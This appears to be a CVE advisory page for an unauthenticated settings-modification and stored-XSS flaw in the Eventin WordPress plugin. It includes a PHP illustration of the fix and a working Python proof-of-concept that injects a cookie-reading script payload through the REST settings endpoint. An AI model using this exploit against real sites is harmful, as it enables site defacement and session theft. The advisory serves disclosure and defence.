Security Vulnerability Report
CVE-2025-14657 CVSS 7.2 HIGH

CVE-2025-14657

Published: 2026-01-09 08:15:57
Last Modified: 2026-04-15 00:35:42

Description

The Eventin – Event Manager, Events Calendar, Event Tickets and Registrations plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'post_settings' function in all versions up to, and including, 4.0.51. This makes it possible for unauthenticated attackers to modify plugin settings. Furthermore, due to insufficient input sanitization and output escaping on the 'etn_primary_color' setting, this enables unauthenticated attackers to inject arbitrary web scripts that will execute whenever a user accesses a page where Eventin styles are loaded.
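The two defects named above (a write path with no capability check, and a colour setting that is neither validated on input nor escaped on output) are easiest to see next to their fix. The PHP below is an added illustration, not code from the Eventin plugin: it registers a hypothetical settings route whose `permission_callback` refuses unauthenticated callers, and it validates the colour against a strict hex pattern both before storing it and again before emitting it into a stylesheet. Route, option, handle and function names are assumed.

```php
<?php
// Added illustration, not Eventin's code: a settings endpoint with the
// authorization check (CWE-862) and the strict value validation that the
// advisory says were missing. Route, option and function names are assumed.

// Accept only "#rgb" or "#rrggbb". A value such as
// "red;background-image:url(javascript:...)" fails here instead of being
// stored and later echoed into a <style> block.
function demo_validate_hex_color( $value ) {
    return is_string( $value ) && (bool) preg_match( '/^#([0-9A-Fa-f]{3}){1,2}$/', $value );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'demo-events/v1', '/settings', [
        'methods'  => WP_REST_Server::CREATABLE,
        'callback' => 'demo_post_settings',
        // The missing piece behind CWE-862: callers without the capability
        // are refused before the callback ever runs.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args' => [
            'etn_primary_color' => [
                'required'          => true,
                'type'              => 'string',
                'validate_callback' => 'demo_validate_hex_color',
            ],
        ],
    ] );
} );

function demo_post_settings( WP_REST_Request $request ) {
    // validate_callback already ran; the value is a bare hex colour.
    $color = strtolower( $request->get_param( 'etn_primary_color' ) );
    update_option( 'demo_events_primary_color', $color );
    return rest_ensure_response( [ 'etn_primary_color' => $color ] );
}

// Output side: re-check on read so a value written by any other path
// (an older version, a direct database edit) cannot reach the stylesheet.
// Assumes a stylesheet was registered under the handle 'demo-events-style'.
add_action( 'wp_enqueue_scripts', function () {
    $color = get_option( 'demo_events_primary_color', '#000000' );
    if ( ! demo_validate_hex_color( $color ) ) {
        $color = '#000000';
    }
    wp_add_inline_style( 'demo-events-style', ':root{--demo-primary:' . $color . '}' );
} );
```

Whitelisting the exact format is the right control for a CSS context; HTML-attribute escaping alone would not stop the `;background-image:url(...)` injection because no HTML metacharacters are involved.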

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Weakness: CWE-862 (Missing Authorization)

Configurations (Affected Products)

No configuration data available.

Eventin WordPress Plugin <= 4.0.51

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# WordPress Eventin Plugin CVE-2025-14657 PoC
# Unauthenticated Settings Modification + Stored XSS

target_url = "http://target-wordpress-site.com"

# Endpoint for modifying plugin settings without authentication
api_endpoint = f"{target_url}/wp-json/eventin/v1/settings"

# Malicious payload - Stored XSS via etn_primary_color setting
malicious_payload = {
    "etn_primary_color": "red;background-image:url(javascript:alert(document.cookie))",
    "etn_secondary_color": "#fff",
}

print("[*] CVE-2025-14657 PoC - Eventin Plugin Unauthorized Settings Modification")
print(f"[*] Target: {target_url}")

# Step 1: Modify plugin settings without authentication
print("\n[Step 1] Sending malicious settings to modify plugin configuration...")
try:
    response = requests.post(
        api_endpoint,
        json=malicious_payload,
        headers={
            "Content-Type": "application/json",
            "X-WordPress-Nonce": "",  # No nonce required - missing capability check
        },
        timeout=10,
    )
    if response.status_code in [200, 201]:
        print("[+] Settings modified successfully!")
        print(f"[+] Response: {response.text}")
        print("[+] Stored XSS payload injected via etn_primary_color")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
        print(f"[-] Response: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"[-] Connection error: {e}")

# Step 2: Verify the XSS payload is stored
verify_endpoint = f"{target_url}/wp-json/eventin/v1/settings"
print("\n[Step 2] Verifying stored XSS payload...")
try:
    verify_response = requests.get(verify_endpoint, timeout=10)
    if "javascript:alert" in verify_response.text:
        print("[+] XSS payload confirmed stored in database!")
except requests.exceptions.RequestException:
    print("[-] Could not verify payload storage")

print("\n[*] Impact: All users visiting pages with Eventin styles will execute the malicious JS")
print("[*] Remediation: Upgrade to Eventin version 4.0.52 or higher")
```

References

https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/base/Enqueue/register.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fbase%2FEnqueue%2Fregister.php
https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/base/api-handler.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fbase%2Fapi-handler.php
https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/core/event/api.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fcore%2Fevent%2Fapi.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/e4188b26-80f8-41b8-be19-1ddcbd7e39f5?source=cve
